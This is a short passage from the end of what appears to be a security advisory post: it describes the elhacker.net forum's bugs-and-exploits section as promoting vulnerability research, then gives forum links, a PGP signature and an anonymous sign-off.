exploitation of vulnerabilities (Bugs and Exploits), aims at promoting
research into techniques for detection and exploitation of vulnerabilities
in any operating system or program that might allow the execution of
arbitrary code, or any other means which violate the confidentiality,
integrity, or availability of information.

http://foro.elhacker.net/
http://foro.elhacker.net/bugs_y_exploits-b32.0/

=============================================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (FreeBSD)

iEYEARECAAYFAkm0mE4ACgkQd963iVkvICn7GQCeIonHNhFV/pdu7uvuZG4ucq+A
lMEAoIEDL8JsG1mbb2RrAutEN2TaXs/5
=mi4f
-----END PGP SIGNATURE-----
--
- Anon

Populares Siempre